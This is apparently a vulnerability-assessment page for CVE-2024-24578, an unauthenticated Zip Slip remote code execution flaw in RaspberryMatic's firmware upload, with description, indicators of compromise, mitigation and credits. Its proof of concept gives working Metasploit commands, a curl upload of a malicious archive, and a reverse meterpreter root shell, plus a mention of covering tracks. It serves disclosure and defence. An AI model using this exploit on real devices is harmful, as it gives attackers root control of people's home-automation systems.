Attacker Value
Very High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
1

CVE-2024-24578

Disclosure Date: March 18, 2024
CVE-2024-24578
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Execution
Techniques
Validation
Validated
Validated
Validated
Initial Access
Techniques
Validation
Validated

Description

RaspberryMatic is an open-source operating system for HomeMatic internet-of-things devices. RaspberryMatic / OCCU prior to version 3.75.6.20240316 contains a unauthenticated remote code execution (RCE) vulnerability, caused by multiple issues within the Java based HMIPServer.jar component. RaspberryMatric includes a Java based HMIPServer, that can be accessed through URLs starting with /pages/jpages. The FirmwareController class does however not perform any session id checks, thus this feature can be accessed without a valid session. Due to this issue, attackers can gain remote code execution as root user, allowing a full system compromise. Version 3.75.6.20240316 contains a patch.

Add Assessment

2
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Common in enterpriseEasy to weaponizeGives privileged accessUnauthenticatedVulnerable in default configuration
Technical Analysis

RaspberryMatic is a free and non-commercial open-source operating system for running a smart-home IoT central to provide connectivity to the homematicIP / HomeMatic hardware line of IoT devices. It can be directly installed on a CCU3 or ELV Charly hardware device. Alternatively, it can also be installed on a wide range of freely available single-board-computers (SBC) like a RaspberryPi, ASUS Tinkerboard, Hardkernel ODROID or hardware platforms like an Intel NUC system. Furthermore, it can be run as a virtual appliance in modern virtualization environments (e.g. Proxmox VE, VirtualBox, Synology VMM, Docker/OCI, Kubernetes/K8s, vmWare ESXi, etc).

RaspberryMatic / OCCU contains a unauthenticated remote code execution (RCE) vulnerability, caused by multiple issues within the Java based HMIPServer.jar component. The webui allows for Firmware uploads which can be reached through the URL /pages/jpages/system/DeviceFirmware/addFirmware.
This allows an unauthenticated attacker to upload a malicious .tgz archive to the server, which will be automatically extracted without any further checks. As this entry can contain ../sequences, it is possible to break out of the predefined temp directory and write files to other locations outside this path.

This vulnerability is commonly known as the Zip Slip vulnerability and can be used to overwrite arbitrary files on the main filesystem. It is therefore possible to overwrite the watchdog script with a malicious payload in /usr/local/addons/mediola/bin, which will be executed every five minutes through a cron job where attackers can gain remote code execution as root user, allowing a full system compromise.

The full details of this vulnerability can be found in the GHSA-q967-q4j8-637h security disclosure from Jens Maus.

You can easily test this vulnerability by downloading a vulnerable OVA image from here and install it in VirtualBox or VMware Fusion.

Proof of Concept

  1. Launch Metasploit
  2. select the zip slip module
  3. set TARGETPAYLOADPATH to ../../../../../../../../../..//usr/local/addons/mediola/bin/watchdog to overwrite watchdog script with payload
  4. run the module
  5. compress the resulting tar file to .tgz format
  6. lauch a Listener
  7. upload the malicious msf.tgz file using curl
  8. wait maximum five minutes for cron to kick-in and run the overwritten watchdog script
  9. Bingo, a meterpreter session should pop-up…
msf6 > use exploit/multi/fileformat/zip_slip
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/fileformat/zip_slip) > options

Module options (exploit/multi/fileformat/zip_slip):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   FILENAME           msf.tar          yes       The name of the archive file
   FTYPE              tar              yes       The archive type (Accepted: tar, zip)
   TARGETPAYLOADPATH  ../payload.bin   yes       The targeted path for payload


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.201.8    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

   **DisablePayloadHandler: True   (no handler will be created!)**


Exploit target:

   Id  Name
   --  ----
   0   Manually determined


View the full module info with the info, or info -d command.
msf6 exploit(multi/fileformat/zip_slip) > set TARGETPAYLOADPATH ../../../../../../../../../..//usr/local/addons/mediola/bin/watchdog
TARGETPAYLOADPATH => ../../../../../../../../../..//usr/local/addons/mediola/bin/watchdog
msf6 exploit(multi/fileformat/zip_slip) > exploit
[+] msf.tar stored at /root/.msf4/local/msf.tar
[*] When extracted, the payload is expected to extract to:
[*] ../../../../../../../../../..//usr/local/addons/mediola/bin/watchdog
msf6 exploit(multi/fileformat/zip_slip) > gzip /root/.msf4/local/msf.tar
[*] exec: gzip /root/.msf4/local/msf.tar

msf6 exploit(multi/fileformat/zip_slip) > mv /root/.msf4/local/msf.tar.gz /root/.msf4/local/msf.tgz
[*] exec: mv /root/.msf4/local/msf.tar.gz /root/.msf4/local/msf.tgz

msf6 exploit(multi/fileformat/zip_slip) > use multi/handler
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 0.0.0.0:4444
msf6 exploit(multi/handler) > jobs

Jobs
====

  Id  Name                    Payload                            Payload opts
  --  ----                    -------                            ------------
  0   Exploit: multi/handler  linux/x86/meterpreter/reverse_tcp  tcp://0.0.0.0:4444

Upload malicious compressed tar file.

# curl --insecure -H "Content-type: multipart/form-data" -F filename=@/root/.msf4/local/msf.tgz https://192.168.201.6/pages/jpages/system/DeviceFirmware/addFirmware
${addDevFirmwareInfoCorrupt}

Wait five minutes…

msf6 exploit(multi/handler) >
[*] Sending stage (1017704 bytes) to 192.168.201.6
[*] Meterpreter session 1 opened (192.168.201.8:4444 -> 192.168.201.6:47982) at 2025-01-28 21:00:01 +0000

msf6 exploit(multi/handler) > sessions -i

Active sessions
===============

  Id  Name  Type                   Information           Connection
  --  ----  ----                   -----------           ----------
  1         meterpreter x86/linux  root @ 192.168.201.6  192.168.201.8:4444 -> 192.168.201.6:47982 (192.168.201.6)

msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 192.168.201.6
OS           :  (Linux 6.1.74)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getuid
Server username: root
meterpreter > shell
Process 15622 created.
Channel 1 created.
uname -a
Linux homematic-raspi 6.1.74 #1 SMP PREEMPT Tue Jan 30 06:46:28 UTC 2024 x86_64 GNU/Linux
exit
meterpreter >

Pretty straightforward, but unfortunately the existing zip-slip module in Metasploit only supports a limited amount of payloads.
However, RaspberryMatic is supported on a range platforms like Raspberry Pi, ASUS Tinkerboard or ODROID which are all ARM based single-board-computers.
Therefore I developed a separate Metasploit module: PR19841 that covers most of the RaspberryMatic supported architectures and fully automates the attack.

Indicators of Compromise (IOCs)

Unfortunately there is not much to go on in the log files. The only IOC might be the overwritten watchdog script in /usr/local/addons/mediola/bin which contains a malicious payload. However, the Metasploit module will cover these tracks by restoring the original watchdog script after a successful attack .

Mitigation

RaspberryMatic versions <= 3.73.9.20240130 are vulnerable. Please upgrade your RaspberryMatic installation to the latest version or at least to version 3.75.6.20240316 where this issue has been fixed.

References

CVE-2024-24578
GHSA-q967-q4j8-637h security disclosure
Metasploit Module PR 19841: RaspberryMatic Unauthenticated RCE via Zip Slip

Credits

h0ng10 => discovery of the vulnerability
jens-maus => verifier and remediation

Log in to Add Reply
CVSS V3 Severity and Metrics
Base Score:
None
Impact Score:
Unknown
Exploitability Score:
Unknown
Vector:
Unknown
Attack Vector (AV):
Unknown
Attack Complexity (AC):
Unknown
Privileges Required (PR):
Unknown
User Interaction (UI):
Unknown
Scope (S):
Unknown
Confidentiality (C):
Unknown
Integrity (I):
Unknown
Availability (A):
Unknown

General Information

Offensive Application
Unknown
Utility Class
Unknown
Ports
Unknown
OS
Unknown
Vulnerable Versions
RaspberryMatic < 3.75.6.20240316
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
Unknown

Vendors

  • jens-maus

Products

  • RaspberryMatic

Additional Info

Authenticated
Unknown
Exploitable
Unknown
Reliability
Unknown
Stability
Unknown
Available Mitigations
Unknown
Shelf Life
Unknown
Userbase/Installbase
Unknown
Patch Effectiveness
Unknown
Technical Analysis